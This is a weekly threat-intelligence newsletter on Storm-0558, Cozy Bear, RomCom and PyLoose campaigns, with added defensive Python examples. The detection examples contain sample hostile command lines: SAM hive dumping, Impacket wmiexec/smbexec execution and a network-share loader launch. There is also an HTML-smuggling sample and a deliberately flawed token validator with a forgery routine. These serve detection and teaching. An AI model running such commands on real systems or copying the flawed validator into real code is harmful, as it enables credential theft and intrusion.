Anomali Cyber Watch: Storm-0558 Exploited Microsoft Token Validation Vulnerability, Cozy Bear Targeted Diplomats, PyLoose Uses memfd RAM-Based Filesystem, and More

Anomali Threat Research
July 18, 2023
<div id="weekly"> <p id="intro"> <p>The threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics:<b> APT, China, Cloud abuse, Fileless Malware, Phishing, Russia, Vietnam,</b> and<b> Vulnerabilities</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. <img src="https://cdn.filestackcontent.com/VQ6ViIiQAm9kbvKvRFPj"/><br/> <b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b> </p>
<div class="trending-threats-article" id="trending-threats"> <h2 id="trendingthreats">Trending Cyber News and Threat Intelligence</h2>
<h3 id="article-1"><a href="https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/" target="_blank">Analysis of Storm-0558 Techniques for Unauthorized Email Access</a></h3> <p>(published: July 14, 2023)</p> <p> Storm-0558 is a China-based threat actor whose activity and tradecraft are consistent with cyberespionage objectives. The group has abused OAuth applications, token theft, and token replay against Microsoft accounts since at least August 2021. From April to July 4, 2023, a new Storm-0558 campaign targeted approximately 25 organizations, including government agencies, together with related consumer accounts. The actors held an acquired Microsoft account (MSA) consumer signing key and used it to forge authentication tokens; a validation error in Microsoft's token-validation code allowed tokens signed with that consumer key to be accepted for Azure AD enterprise accounts. Storm-0558 then used PowerShell and Python scripts to issue REST API calls against the OWA Exchange Store service and extract email data.<br/> <b>Analyst Comment:</b> Microsoft has blocked the underlying validation error and invalidated the actor-acquired MSA signing key, and Storm-0558 has since moved to other techniques. No further customer action is required to prevent the described key forgery. Organizations in the targeted sectors should still review their Exchange Online mailbox audit logs (for example, MailItemsAccessed events) for the April to July 2023 window, and Anomali Match customers can use the available historical indicators to detect past occurrences of such attacks through retrospective search.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10026" target="_blank">[MITRE ATT&amp;CK] T1606.002 - Forge Web Credentials: Saml Tokens</a> | <a href="https://ui.threatstream.com/attackpattern/10030" target="_blank">[MITRE ATT&amp;CK] T1528 - Steal Application Access Token</a> | <a href="https://ui.threatstream.com/attackpattern/10032" target="_blank">[MITRE ATT&amp;CK] T1550.001 - Use Alternate Authentication Material: Application Access Token</a> | <a href="https://ui.threatstream.com/attackpattern/3712" target="_blank">[MITRE ATT&amp;CK] T1059.001: PowerShell</a> | <a href="https://ui.threatstream.com/attackpattern/9668" target="_blank">[MITRE ATT&amp;CK] T1114 - Email Collection</a><br/> <b>Tags:</b> actor:Storm-0558, malware:Cigril, detection:Trojan:Win64/Cigril, detection:Trojan:Win32/Cigril, abused:PowerShell, abused:Python, target-software:Microsoft Exchange, target-industry:Government, source-country:China, technique:Token forgery, vulnerability-type:Validation error, file-type:DLL, target-system:Windows </p>
<h3 id="article-2"><a href="https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/" target="_blank">Diplomats Beware: Cloaked Ursa Phishing With a Twist</a></h3> <p>(published: July 12, 2023)</p> <p> In 2023, the Russia-sponsored Cozy Bear group (APT29, Cloaked Ursa, Midnight Blizzard/Nobelium) conducted direct cyberespionage against diplomatic targets. In February and March the group targeted the Turkish Ministry of Foreign Affairs, and in May at least 22 diplomatic missions in Kyiv, Ukraine were targeted with phishing attachments. In both cases the Microsoft Graph and Dropbox APIs were abused for C2 communication. Payloads recovered from these incidents share an encryption implementation and other code similarities with previously reported Cozy Bear malware families such as SNOWYAMBER and QUARTERRIG. <br/> <b>Analyst Comment:</b> Network defenders should apply additional scrutiny to attachments with the following file extensions: .hta, .htm, .html, .mht, .mhtml, .svg, .xht and .xhtml. Teach users to recognize mismatched and obfuscated file extensions, and inspect archives for hidden files and directories. Because the C2 channel rides on Microsoft Graph and Dropbox, blocking by destination domain alone is not practical; instead baseline which hosts and processes legitimately talk to those APIs and alert on new OAuth application consents or on Dropbox and Graph traffic from unexpected processes. All known network indicators associated with this Cozy Bear campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/12882" target="_blank">[MITRE ATT&amp;CK] T1027.006 - Obfuscated Files or Information: Html Smuggling</a> | <a href="https://ui.threatstream.com/attackpattern/10001" target="_blank">[MITRE ATT&amp;CK] T1566.001 - Phishing: Spearphishing Attachment</a> | <a href="https://ui.threatstream.com/attackpattern/9597" target="_blank">[MITRE ATT&amp;CK] T1036 - Masquerading</a> | <a href="https://ui.threatstream.com/attackpattern/10105" target="_blank">[MITRE ATT&amp;CK] T1574.001 - Hijack Execution Flow: Dll Search Order Hijacking</a> | <a href="https://ui.threatstream.com/attackpattern/9814" target="_blank">[MITRE ATT&amp;CK] T1055 - Process Injection</a> | <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/9748" target="_blank">[MITRE ATT&amp;CK] T1567.002 - Exfiltration Over Web Service: Exfiltration To Cloud Storage</a><br/> <b>Tags:</b> actor:APT29, actor:Cloaked Ursa, mitre-group:Cozy Bear, actor:Midnight Blizzard, actor:Nobelium, source-country:Russia, actor-identity:Foreign Intelligence Service, target-country:Turkey, target-country:Ukraine, target-country:Albania, target-country:Argentina, target-country:Canada, target-country:Cyprus, target-country:Denmark, target-country:Estonia, target-country:Greece, target-country:Iraq, target-country:Ireland, target-country:Kuwait, target-country:Kyrgyzstan, target-country:Latvia, target-country:Libya, target-country:Netherlands, target-country:Norway, target-country:Slovakia, target-country:Spain, target-country:Sudan, target-country:Turkmenistan, target-country:United States, target-country:Uzbekistan, malware:SNOWYAMBER, malware:QUARTERRIG, abused:Microsoft Graph, abused:Dropbox API, file-type:DOCX, file-type:HTML, technique:HTML smuggling, file-type:ISO, file-type:LNK, file-type:EXE, file-type:DLL, target-system:Windows </p>
<h3 id="article-3"><a href="https://www.malwarebytes.com/blog/threat-intelligence/2023/07/criminals-target-businesses-with-malicious-extension-for-metas-ads-manager-and-accidentally-leak-stolen-accounts" target="_blank">Criminals Target Businesses with Malicious Extension for Meta's Ads Manager and Accidentally Leak Stolen Accounts</a></h3> <p>(published: July 12, 2023)</p> <p> Malwarebytes has identified a Vietnam-based campaign that impersonates Facebook Ads Manager to steal Facebook business account cookies. Over 800 victims have been identified worldwide (310 in the USA), with more than $180K in compromised ad budgets. Fake Ads Manager software is promoted on Facebook itself, with links to password-protected RAR archives hosted on various cloud services (Google, Trello, and others). The extracted MSI installer deploys several components and spawns a new browser window with the attackers' custom malicious extension loaded, pointing the target at the Facebook login page. The extension steals the resulting Facebook session cookies and exfiltrates them by abusing Google Analytics. The ultimate goal is to hijack ad budgets, both to run further malicious ads that ensnare more victims and for other malicious purposes.<br/> <b>Analyst Comment:</b> Facebook business account owners should regularly review their transaction history and revoke access for unknown users in their Business Manager account. Because the attackers authenticate with stolen session cookies rather than passwords, a password change on its own does not end their access: rotate the password and terminate all active sessions so the stolen cookies are invalidated. Be cautious around promoted content, and double-check the domains offering installers and other software components. All known network indicators associated with this campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/10031" target="_blank">[MITRE ATT&amp;CK] T1539 - Steal Web Session Cookie</a> | <a href="https://ui.threatstream.com/attackpattern/10024" target="_blank">[MITRE ATT&amp;CK] T1550.004 - Use Alternate Authentication Material: Web Session Cookie</a> | <a href="https://ui.threatstream.com/attackpattern/10081" target="_blank">[MITRE ATT&amp;CK] T1036.005 - Masquerading: Match Legitimate Name Or Location</a><br/> <b>Tags:</b> source-country:Vietnam, technique:Malvertising, technique:malicious Chrome extension, target-identity:Facebook business account, impersonated:Facebook Ads Manager, impersonated:Meta, impersonated:Google Translate, abused:Trello, abused:Google, abused:Google Analytics, file-type:RAR, file-type:MSI, file-type:JS, file-type:EXE, target-software:Chrome, target-system:Windows </p>
<h3 id="article-4"><a href="https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/" target="_blank">Storm-0978 Attacks Reveal Financial and Espionage Motives</a></h3> <p>(published: July 11, 2023)</p> <p> RomCom (DEV-0978, Storm-0978) is a Russia-based threat group that has run ransomware operations since at least May 2022 and cyberespionage since October 2022. Its intrusions have used trojanized software, phishing emails, and, most recently, exploitation of CVE-2023-36884, a remote code execution vulnerability triggered through Microsoft Word documents. In June 2023, a RomCom cyberespionage campaign used Ukrainian-themed phishing lures carrying a fake OneDrive loader, which delivered a backdoor with similarities to the RomCom backdoor to defense and government entities in Europe and North America. The group's ransomware campaigns can begin with the same initial payloads but are opportunistic in nature, impacting the telecommunications and finance industries. After obtaining SYSTEM-level privileges, RomCom dumped password hashes from the Security Account Manager (SAM) by saving the registry hives, and then used the Impacket framework's smbexec and wmiexec modules for lateral movement. In July 2023, RomCom began using a ransomware variant called Underground, which contains significant code overlaps with its earlier Industrial Spy ransomware. <br/> <b>Analyst Comment:</b> Network defenders are advised to enforce the "Block all Office applications from creating child processes" attack-surface reduction rule (rule ID D4F940AB-401B-4EFC-AADC-AD5F3C50688A) in block mode, which also cuts off the Office-spawned process chain this exploit relies on. Keep your systems updated, or implement Microsoft's CVE-2023-36884-specific recommendations; at the time of publication no patch was available and Microsoft's interim mitigation was the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry setting for the Office applications. Registry-based SAM dumps (reg save of the SAM, SYSTEM and SECURITY hives) and the default command-line artifacts of Impacket's wmiexec and smbexec are reliable process-creation detections for this group's post-exploitation activity.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/9883" target="_blank">[MITRE ATT&amp;CK] T1566 - Phishing</a> | <a href="https://ui.threatstream.com/attackpattern/3714" target="_blank">[MITRE ATT&amp;CK] T1486: Data Encrypted for Impact</a> | <a href="https://ui.threatstream.com/attackpattern/9684" target="_blank">[MITRE ATT&amp;CK] T1003.002 - OS Credential Dumping: Security Account Manager</a> | <a href="https://ui.threatstream.com/attackpattern/23579" target="_blank">[MITRE ATT&amp;CK] Picus: T1047 Windows Management Instrumentation of the MITRE ATT&amp;CK Framework</a> | <a href="https://ui.threatstream.com/attackpattern/9647" target="_blank">[MITRE ATT&amp;CK] T1021.002 - Remote Services: Smb/Windows Admin Shares</a><br/> <b>Tags:</b> actor:Storm-0978, actor:RomCom, malware:RomCom, malware-type:Backdoor, malware-type:Infostealer, detection:Ransom:Win32/IndustrialSpy, detection:Trojan:Win32/RomCom, detection:Trojan:Win64/RomCom, detection:HackTool:Win32/Impacket, detection:HackTool:Python/Impacket, malware:Industrial Spy, malware:Underground ransomware, malware:Trigona ransomware, malware-type:Ransomware, abused:Impacket, abused:SMBExec, abused:WMIExec, target-industry:Defense, target-industry:IT, target-industry:Finance, target-industry:Government, target-region:Europe, target-region:North America, target-country:Ukraine, source-country:Russia, vulnerability:CVE-2023-36884, vulnerability-type:Remote code execution, abused:Microsoft Word, target-system:Windows </p>
<h3 id="article-5"><a href="https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads" target="_blank">PyLoose: Python-Based Fileless Malware Targets Cloud Workloads to Deliver Cryptominer</a></h3> <p>(published: July 11, 2023)</p> <p> First detected on June 22, 2023, a new fileless attack dubbed PyLoose has targeted close to 200 cloud workloads (collections of cloud assets that collectively support a defined process). The Python loader decodes a Base64-encoded, zlib-compressed XMRig miner and writes it into an anonymous in-memory file created with the Linux memfd_create system call, then executes it from there, so the miner never touches disk and file-based security tooling has nothing to scan. Wiz researchers determined that the initial access vector was publicly accessible Jupyter Notebook services, which allow arbitrary code execution by design.<br/> <b>Analyst Comment:</b> Organizations should limit unnecessary public exposure of Jupyter Notebook services and require token or password authentication on any instance that must be reachable. Processes executed from a memfd are still visible on the host: /proc/&lt;pid&gt;/exe resolves to a target of the form /memfd:&lt;name&gt; (deleted), which is a high-signal hunt across Linux fleets, although a few legitimate tools also run from memfd, so confirm before acting. All known PyLoose indicators are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/9721" target="_blank">[MITRE ATT&amp;CK] T1102 - Web Service</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/9592" target="_blank">[MITRE ATT&amp;CK] T1027.002 - Obfuscated Files or Information: Software Packing</a> | <a href="https://ui.threatstream.com/attackpattern/12881" target="_blank">[MITRE ATT&amp;CK] T1620 - Reflective Code Loading</a> | <a href="https://ui.threatstream.com/attackpattern/10023" target="_blank">[MITRE ATT&amp;CK] T1496 - Resource Hijacking</a><br/> <b>Tags:</b> malware:PyLoose, abused:memfd, abused:Python, abused:Base64, abused:zlib, abused:MoneroOcean, technique:Fileless malware, detection:XMRig, technique:Cryptomining, target-software:Jupyter Notebook, target-system:Linux </p> </div> </p></div>
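The Storm-0558 story above turns on a validator that checked a token's signature but not whether the signing key was one that the token's issuer is allowed to use. The following example, added here and not code from Microsoft or from the Anomali write-up, shows that class of flaw beside the corrected check. The key IDs, secrets, issuer and audience URLs are constructed, and HMAC secrets stand in for the RSA keys real identity providers publish, so that the example runs offline.

```python
import base64
import hashlib
import hmac
import json

# Constructed key directory (an assumption of this example). Each key records the
# issuer(s) it is allowed to sign for: the consumer (MSA) key must never be accepted
# for an enterprise tenant, no matter how valid its signature is.
KEYS = {
    "msa-consumer-2016": {
        "secret": b"consumer-signing-secret",
        "issuers": {"https://login.live.com"},
    },
    "aad-enterprise-2023": {
        "secret": b"enterprise-signing-secret",
        "issuers": {"https://login.microsoftonline.com/contoso-tenant/v2.0"},
    },
}
ENTERPRISE_ISSUER = "https://login.microsoftonline.com/contoso-tenant/v2.0"
EXCHANGE_AUDIENCE = "https://outlook.office365.example"  # constructed audience


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_token(kid: str, claims: dict) -> str:
    """Mint a JWT with the named key: what an actor holding a stolen key can do."""
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    signing_input = b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(claims).encode())
    sig = hmac.new(KEYS[kid]["secret"], signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_signature(token: str):
    """Check the signature against whatever key the 'kid' header names. Returns (kid, claims)."""
    head, body, sig = token.split(".")
    kid = json.loads(b64url_decode(head))["kid"]
    if kid not in KEYS:
        raise ValueError("unknown kid")
    expected = hmac.new(KEYS[kid]["secret"], f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("bad signature")
    return kid, json.loads(b64url_decode(body))


def validate_naive(token: str, audience: str) -> dict:
    """Flawed: every key in the directory is trusted for every issuer."""
    _, claims = verify_signature(token)
    if claims.get("aud") != audience:
        raise ValueError("wrong audience")
    return claims


def validate_scoped(token: str, audience: str, issuer: str) -> dict:
    """Hardened: the key that signed the token must be authorised for the token's issuer."""
    kid, claims = verify_signature(token)
    if claims.get("iss") != issuer:
        raise ValueError("wrong issuer")
    if issuer not in KEYS[kid]["issuers"]:
        raise ValueError(f"key {kid} is not a signing key for {issuer}")
    if claims.get("aud") != audience:
        raise ValueError("wrong audience")
    return claims


def forged_enterprise_token() -> str:
    """A token for an enterprise mailbox, signed with only the consumer key."""
    return sign_token("msa-consumer-2016", {
        "iss": ENTERPRISE_ISSUER, "aud": EXCHANGE_AUDIENCE, "upn": "victim@contoso.example",
    })


def naive_accepts(token: str) -> bool:
    try:
        validate_naive(token, EXCHANGE_AUDIENCE)
        return True
    except ValueError:
        return False


def scoped_accepts(token: str) -> bool:
    try:
        validate_scoped(token, EXCHANGE_AUDIENCE, ENTERPRISE_ISSUER)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    forged = forged_enterprise_token()
    print("naive validator accepts forged token: ", naive_accepts(forged))
    print("scoped validator accepts forged token:", scoped_accepts(forged))
```

The point of the scoped check is that a `kid` lookup alone answers "is this signature genuine?" and not "was this key ever entitled to vouch for this tenant?"; both questions have to be asked before the audience check even matters.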
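The Cozy Bear analyst comment lists attachment extensions that deserve extra scrutiny and asks users to spot mismatched extensions. The following triage routine, added as an example and not part of the Unit 42 report or the Anomali platform, turns that advice into a check that can run in a mail-gateway hook: it flags the listed extensions, double extensions behind a decoy suffix, the right-to-left override character, and the browser-side decode-and-download pattern that characterizes HTML smuggling. The marker regexes and the two sample attachments are constructed for this example.

```python
import re
from dataclasses import dataclass, field

# Extensions the Unit 42 write-up singles out for extra scrutiny.
WATCHED_EXTENSIONS = {".hta", ".htm", ".html", ".mht", ".mhtml", ".svg", ".xht", ".xhtml"}
# Innocuous "first" extensions commonly used to disguise a double extension (assumed list).
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".jpg", ".png", ".txt"}
RTLO = "\u202e"  # Right-to-left override, which visually reverses the tail of a filename

# Constructed markers of HTML smuggling: decode an embedded blob in the browser, then
# force a download of it. Any one alone is common in benign pages; several together are not.
SMUGGLING_MARKERS = {
    "atob_decode": re.compile(r"\batob\s*\("),
    "blob_object": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "forced_download": re.compile(r"\.download\s*=\s*['\"]|msSaveOrOpenBlob|msSaveBlob"),
    "large_base64": re.compile(r"[A-Za-z0-9+/]{512,}={0,2}"),
}


@dataclass
class Finding:
    filename: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A lone watched extension is noise (plenty of legitimate .html mail); require corroboration.
        return len(self.reasons) >= 2


def filename_reasons(filename: str) -> list:
    reasons = []
    if RTLO in filename:
        reasons.append("rtlo-character")
    parts = filename.lower().rsplit(".", 2)
    if len(parts) >= 2 and "." + parts[-1] in WATCHED_EXTENSIONS:
        reasons.append("watched-extension:" + parts[-1])
    if len(parts) == 3 and "." + parts[-2] in DECOY_EXTENSIONS:
        reasons.append("double-extension")
    return reasons


def content_reasons(content: str) -> list:
    return [f"smuggling:{name}" for name, rx in SMUGGLING_MARKERS.items() if rx.search(content)]


def triage_attachment(filename: str, content: str = "") -> Finding:
    finding = Finding(filename)
    finding.reasons = filename_reasons(filename) + content_reasons(content)
    return finding


# Constructed sample attachments for a dry run (not real campaign artifacts).
SAMPLE_SMUGGLED_HTML = (
    "<html><body><script>"
    "var b64 = '" + "QUFB" * 200 + "';"
    "var bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0));"
    "var blob = new Blob([bytes], {type: 'application/octet-stream'});"
    "var a = document.createElement('a');"
    "a.href = URL.createObjectURL(blob); a.download = 'Invitation.iso'; a.click();"
    "</script></body></html>"
)
SAMPLE_BENIGN_HTML = "<html><body><p>Agenda for Thursday</p></body></html>"

if __name__ == "__main__":
    for name, body in [("Invitation.pdf.html", SAMPLE_SMUGGLED_HTML), ("agenda.html", SAMPLE_BENIGN_HTML)]:
        f = triage_attachment(name, body)
        print(name, "suspicious" if f.suspicious else "ok", f.reasons)
```

Scoring on corroboration rather than on any single hit keeps the rule usable: a plain `.html` newsletter gets one weak reason and passes, while a smuggled payload typically trips three or four markers at once.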
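The RomCom story describes registry-based SAM dumping followed by lateral movement with Impacket's smbexec and wmiexec, and its analyst comment recommends blocking Office child processes. The detection logic below is an added example, not Microsoft's or Anomali's code. It runs the three corresponding process-creation checks over a constructed log sample in a simple `host|parent|image|command line` format; the field layout and every event in the sample are this example's own. The command-line shapes it matches are Impacket's defaults, which an operator can change, so treat them as high-confidence rather than exhaustive.

```python
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Rule order determines hit order in the output.
RULES = [
    # reg.exe save of the hives needed to recover local account hashes offline.
    ("sam-hive-export",
     re.compile(r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|system|security)\b", re.I)),
    # wmiexec.py default: cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<unix time> 2>&1
    ("impacket-wmiexec",
     re.compile(r"cmd\.exe\s+/Q\s+/c\s+.*\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.I)),
    # smbexec.py default: a service runs a batch file that echoes output to \\127.0.0.1\C$\__output
    ("impacket-smbexec",
     re.compile(r"\\\\127\.0\.0\.1\\C\$\\__output|\\execute\.bat\b", re.I)),
]


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def parse_line(line: str) -> ProcEvent:
    """Constructed format: host|parent image|image path|command line (pipes only as separators)."""
    host, parent, image, cmd = line.split("|", 3)
    return ProcEvent(host, parent, image, cmd)


def classify(event: ProcEvent) -> list:
    hits = [name for name, rx in RULES if rx.search(event.command_line)]
    if event.parent_image.lower() in OFFICE_PARENTS:
        hits.append("office-child-process")  # what the ASR rule in the analyst comment blocks outright
    return hits


def detect(log_text: str) -> list:
    """Return (host, image, hits) for every event that triggers at least one rule."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        hits = classify(event)
        if hits:
            findings.append((event.host, event.image, hits))
    return findings


# Constructed sample events (hypothetical hosts, paths and timestamps).
SAMPLE_LOG = """\
WS01|explorer.exe|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs
WS01|winword.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c start \\\\10.0.0.5\\share\\loader.exe
SRV02|wmiprvse.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /Q /c reg save hklm\\sam C:\\Windows\\Temp\\sam.hiv 1> \\\\127.0.0.1\\ADMIN$\\__1688990000.12 2>&1
SRV02|services.exe|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\system32\\cmd.exe /Q /c echo whoami ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > C:\\Windows\\TEMP\\execute.bat & C:\\Windows\\system32\\cmd.exe /Q /c C:\\Windows\\TEMP\\execute.bat & del C:\\Windows\\TEMP\\execute.bat
"""

if __name__ == "__main__":
    for host, image, hits in detect(SAMPLE_LOG):
        print(host, image, ", ".join(hits))
```

Note that the third sample event fires two rules at once: wmiexec is the transport and the SAM export is the payload, which is exactly the pairing the article describes, and correlating both on one host within a short window is a stronger alert than either alone.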
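The PyLoose story hinges on memfd, and its analyst comment points at the artifact memfd leaves behind in /proc. The example below, added here and not Wiz's or Anomali's code, does two things with a harmless payload: it creates an anonymous in-memory file the way a fileless loader does and shows the `/memfd:<name> (deleted)` path the kernel reports for it, and it implements the corresponding hunt over /proc, run both live and against a constructed table of exe link targets. The sample PIDs and paths are invented for this example; nothing is executed from the memfd.

```python
import os
import re
from typing import Optional

# A process whose main executable lives in a memfd shows this link target for /proc/<pid>/exe.
MEMFD_EXE = re.compile(r"^/memfd:(?P<name>.*) \(deleted\)$")


def is_memfd_exe(link_target: str) -> bool:
    return MEMFD_EXE.match(link_target) is not None


def memfd_name(link_target: str) -> Optional[str]:
    m = MEMFD_EXE.match(link_target)
    return m.group("name") if m else None


def memfd_artifact_demo(payload: bytes = b"#!/bin/sh\necho hello\n") -> Optional[str]:
    """Create an anonymous RAM-backed file, write a harmless payload into it, and return the
    path artifact the kernel exposes for it. Returns None where memfd_create is unavailable
    or blocked. A loader would go on to execute /proc/self/fd/<fd>; this demo does not."""
    if not hasattr(os, "memfd_create"):
        return None
    try:
        fd = os.memfd_create("demo", os.MFD_CLOEXEC)
    except OSError:
        return None
    try:
        os.write(fd, payload)
        return os.readlink(f"/proc/self/fd/{fd}")
    finally:
        os.close(fd)


def scan_proc(proc_root: str = "/proc") -> list:
    """Live hunt: (pid, memfd name, cmdline) for every process executing from a memfd.
    Returns [] on hosts without procfs. Run as root to see every process."""
    findings = []
    if not os.path.isdir(proc_root):
        return findings
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:  # kernel thread, process already gone, or no permission
            continue
        if is_memfd_exe(target):
            try:
                with open(os.path.join(proc_root, entry, "cmdline"), "rb") as fh:
                    cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
            except OSError:
                cmdline = ""
            findings.append((int(entry), memfd_name(target), cmdline))
    return findings


# Constructed sample of /proc/<pid>/exe link targets, as a scanner would read them.
SAMPLE_EXE_LINKS = {
    1: "/usr/lib/systemd/systemd",
    1337: "/usr/bin/python3.10",
    2042: "/memfd:xmrig (deleted)",
    2043: "/usr/bin/bash",
}


def flag_sample(links: dict) -> list:
    return [(pid, memfd_name(target)) for pid, target in links.items() if is_memfd_exe(target)]


if __name__ == "__main__":
    print("artifact for a fresh memfd:", memfd_artifact_demo())
    print("sample table hits:", flag_sample(SAMPLE_EXE_LINKS))
    print("live hits on this host:", scan_proc())
```

The `(deleted)` suffix is the kernel's way of saying the path has no directory entry, which is precisely why file-scanning tools miss it; the link target is still readable, and so is /proc/<pid>/exe itself, which can be copied out for analysis while the process is alive.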
Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.
